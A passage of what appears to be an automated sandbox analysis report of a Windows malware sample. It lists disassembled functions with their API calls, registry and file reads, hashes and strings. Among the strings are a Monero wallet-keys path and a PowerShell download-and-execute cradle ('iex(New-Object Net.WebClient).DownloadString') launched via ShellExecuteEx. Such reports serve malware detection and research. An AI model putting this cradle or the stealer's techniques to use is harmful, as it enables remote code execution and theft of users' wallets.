                  • RegQueryValueExA.ADVAPI32(00000000,00C8E140,00000000,000F003F,?,00000400), ref: 00FC84EC
                  • lstrlen.KERNEL32(?), ref: 00FC8501
                  • RegQueryValueExA.ADVAPI32(00000000,00C8DEA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00FD0B34), ref: 00FC8599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC8608
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: 6e79f133d0271ac4b03d537eae4a36bb6873edd220c28fbc7d9adb41f3eb977e
                  • Instruction ID: a0f56f12b7bafc7a6723ede84cd0815d23656aed3b10fdc6d536dc5ab5ac88c8
                  • Opcode Fuzzy Hash: 6e79f133d0271ac4b03d537eae4a36bb6873edd220c28fbc7d9adb41f3eb977e
                  • Instruction Fuzzy Hash: F321F671900218ABDB28DB54DD85FE9B3B8FF48710F0081A9A609A7180DF75AA86DF94
                  Function 00FC7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC76A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC76AB
                  • RegOpenKeyExA.ADVAPI32(80000002,00C7C4A8,00000000,00020119,00000000), ref: 00FC76DD
                  • RegQueryValueExA.ADVAPI32(00000000,00C8E128,00000000,00000000,?,000000FF), ref: 00FC76FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00FC7708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 75b613ee5e58426824e5107e93271ce694a4564e5babf4d62aa56dde8f58a476
                  • Instruction ID: b1cde68706288d3a1ac3c1337e2e66bc3273b450f7a8a01b84dc80f77cb100a5
                  • Opcode Fuzzy Hash: 75b613ee5e58426824e5107e93271ce694a4564e5babf4d62aa56dde8f58a476
                  • Instruction Fuzzy Hash: 2B018FB5A04309BBD714EBE0E94AF69B7B8EF48701F00406CFA19D7284D6B8A9409F50
                  Function 00FC7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC773B
                  • RegOpenKeyExA.ADVAPI32(80000002,00C7C4A8,00000000,00020119,00FC76B9), ref: 00FC775B
                  • RegQueryValueExA.ADVAPI32(00FC76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00FC777A
                  • RegCloseKey.ADVAPI32(00FC76B9), ref: 00FC7784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: fae3a863ae4e7840138d1a73af95a7e73b391f07716f227c5717ea9ff7f39994
                  • Instruction ID: fda3c497a9e31a172258c22a7ec3b588f8c14ddf4bbdc89e07348c5728351167
                  • Opcode Fuzzy Hash: fae3a863ae4e7840138d1a73af95a7e73b391f07716f227c5717ea9ff7f39994
                  • Instruction Fuzzy Hash: 1F0144B5A40308BBD714DBE0EC4AFAEB7B8EF48701F00416DFA19A7285DAB565408B51
                  Function 00FB99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FB99EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FB9A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,00FB148F,00000000), ref: 00FB9A5A
                  • LocalFree.KERNEL32(00FB148F), ref: 00FB9A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00FB9A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 7ee98bfbb9c8651efb1669a9693e4432d7089b52c4d57a15c30d65af3cd732dc
                  • Instruction ID: 43a6e8938df574d92546ac7bce625e0e450e6e1e46110fc13c804e3c9ddeb89c
                  • Opcode Fuzzy Hash: 7ee98bfbb9c8651efb1669a9693e4432d7089b52c4d57a15c30d65af3cd732dc
                  • Instruction Fuzzy Hash: 8C313874E00209EFDB24CF95D985BEE77B8FF48310F108158E915A7290D778A981DFA0
                  Function 00FC4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,00C8E2D8), ref: 00FC47DB
                    • Part of subcall function 00FC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00FC8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4801
                  • lstrcat.KERNEL32(?,?), ref: 00FC4820
                  • lstrcat.KERNEL32(?,?), ref: 00FC4834
                  • lstrcat.KERNEL32(?,00C7B6F8), ref: 00FC4847
                  • lstrcat.KERNEL32(?,?), ref: 00FC485B
                  • lstrcat.KERNEL32(?,00C8DB60), ref: 00FC486F
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FC8D90: GetFileAttributesA.KERNEL32(00000000,?,00FB1B54,?,?,00FD564C,?,?,00FD0E1F), ref: 00FC8D9F
                    • Part of subcall function 00FC4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00FC4580
                    • Part of subcall function 00FC4570: RtlAllocateHeap.NTDLL(00000000), ref: 00FC4587
                    • Part of subcall function 00FC4570: wsprintfA.USER32 ref: 00FC45A6
                    • Part of subcall function 00FC4570: FindFirstFileA.KERNEL32(?,?), ref: 00FC45BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 8ccbb2d8bc453ae06a491ae7e70d234e8717f10a234968b7cde7f9928335610b
                  • Instruction ID: 392d0424c6bce28536623997a32818de49cf7719c1bd493ef9d0674759ebb8e1
                  • Opcode Fuzzy Hash: 8ccbb2d8bc453ae06a491ae7e70d234e8717f10a234968b7cde7f9928335610b
                  • Instruction Fuzzy Hash: 993162B690021857CB24F7A0DC86FE97378AF48700F40459DB31996081EEB8A6C99B95
                  Function 00FC2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                    • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00C89158,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                    • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                    • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                    • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                    • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                    • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00FC2D85
                  Strings
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00FC2D04
                  • ')", xrefs: 00FC2CB3
                  • <, xrefs: 00FC2D39
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00FC2CC4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 7a15d8216b0de56d73d5b2bebbf0024ae6be9926345dcf1122c117e22b5cb2cb
                  • Instruction ID: 5e1e31676f812e5342e52b0100bfb55643f9d54a64d1cb1e9c842e00c58fd3a9
                  • Opcode Fuzzy Hash: 7a15d8216b0de56d73d5b2bebbf0024ae6be9926345dcf1122c117e22b5cb2cb
                  • Instruction Fuzzy Hash: 3341B97181020D9BDB18EBA0DD97FEDB774AF10304F40411DE016AA1D1EF786A4AEF96
                  Function 00FB9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FB9F41
                    • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                    • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 45f4ba0421dfe0b0d45fff59a6b044177ba28fb74ffe88e32952d41645fc48bc
                  • Instruction ID: 097aaa39ada23faf06523a242081f854b2943450ffc55fe72d555b5143dedac0
                  • Opcode Fuzzy Hash: 45f4ba0421dfe0b0d45fff59a6b044177ba28fb74ffe88e32952d41645fc48bc
                  • Instruction Fuzzy Hash: C5614C71A0020CABDB24EFA5CD96FED7775BF44344F048118F90A5B281EB78AA05EF52
                  Function 00FC40B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,00C8DAA0,00000000,00020119,?), ref: 00FC40F4
                  • RegQueryValueExA.ADVAPI32(?,00C8E320,00000000,00000000,00000000,000000FF), ref: 00FC4118
                  • RegCloseKey.ADVAPI32(?), ref: 00FC4122
                  • lstrcat.KERNEL32(?,00000000), ref: 00FC4147
                  • lstrcat.KERNEL32(?,00C8E338), ref: 00FC415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValue
                  • String ID:
                  • API String ID: 690832082-0
                  • Opcode ID: 2cd82810e82c479980ea2231c776630473e7ff67576512994c63e66879f8f152
                  • Instruction ID: 89ddc70a09cffd65d42c840033be18a837175423143535cb83d7445ffda984d5
                  • Opcode Fuzzy Hash: 2cd82810e82c479980ea2231c776630473e7ff67576512994c63e66879f8f152
                  • Instruction Fuzzy Hash: BF41EAB6D001086BDB28EBA0EC57FED373CBB48340F44455CB62957185EA795BC88BE1
                  Function 00FC6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 00FC696C
                  • sscanf.NTDLL ref: 00FC6999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FC69B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00FC69C0
                  • ExitProcess.KERNEL32 ref: 00FC69DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714747116.0000000001644000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: b08c64b4e23dcdb9214faf6ae1e26ff99f84427d8fe895844db4b5e745dcf543
                  • Instruction ID: 0013c20cde79ceeb0cf974ae05ffa057f2f4fda2db9d2775cac92aff22e90b31
                  • Opcode Fuzzy Hash: b08c64b4e23dcdb9214faf6ae1e26ff99f84427d8fe895844db4b5e745dcf543
                  • Instruction Fuzzy Hash: 2821EC75D04209ABCF08EFE4E946AEEB7B5BF48300F04852EE41AE3244EB346605CB65
                  Function 00FC7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,00C7C010,00000000,00020119,?), ref: 00FC7E5E
                  • RegQueryValueExA.ADVAPI32(?,00C8DC00,00000000,00000000,000000FF,000000FF), ref: 00FC7E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00FC7E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1714191818.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                  • Associated: 00000000.00000002.1714174137.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714191818.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.000000000146E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001492000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.0000000001499000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714337528.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714621077.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1714730643.0000000001643000.00000040.00000001.01000000.00000003.sdmpDownload File
